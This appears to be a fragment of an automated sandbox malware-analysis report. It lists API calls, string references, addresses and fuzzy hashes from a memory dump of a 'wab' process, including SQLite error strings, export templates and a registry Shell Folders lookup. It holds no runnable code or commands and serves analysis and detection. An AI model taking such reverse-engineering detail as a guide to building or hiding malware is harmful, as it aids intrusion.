                                                                                                                                                                                                                    • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                                                    • String ID: 6$\
                                                                                                                                                                                                                    • API String ID: 404372293-1284684873
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1331804452-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID: advapi32.dll
                                                                                                                                                                                                                    • API String ID: 2012295524-4050573280
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • <%s>, xrefs: 004100A6
                                                                                                                                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                                    • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                                                                                                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                    • API String ID: 3473751417-2880344631
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                                                                    • API String ID: 2521778956-791839006
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintfwcscpy
                                                                                                                                                                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                                    • API String ID: 999028693-502967061
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memsetstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2350177629-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                    • API String ID: 2221118986-1606337402
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 265355444-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                      • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                      • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                    • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1973883786-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                                                                                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004185FC
                                                                                                                                                                                                                    • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@AttributesFilememset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PathTemp$??3@
                                                                                                                                                                                                                    • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                                                      • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                                                                                                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                                                    • String ID: General
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                                                                                                                    • API String ID: 313946961-1552265934
                                                                                                                                                                                                                    • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                                                    • API String ID: 0-1953309616
                                                                                                                                                                                                                    • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                    • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                    • API String ID: 3510742995-272990098
                                                                                                                                                                                                                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                                                    • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                    • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                                                                                                                                                                      • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: fdaf7c221553fa3d99baedce4f360f1f5535380ea0dd65d5a88a596ccf078b3c
                                                                                                                                                                                                                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fdaf7c221553fa3d99baedce4f360f1f5535380ea0dd65d5a88a596ccf078b3c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2903831945-0
                                                                                                                                                                                                                    • Opcode ID: 57d3071dd2de7bbc8e1c08973dbf7d9290014f20ee3246d914a41c796bcca670
                                                                                                                                                                                                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57d3071dd2de7bbc8e1c08973dbf7d9290014f20ee3246d914a41c796bcca670
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4247780290-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
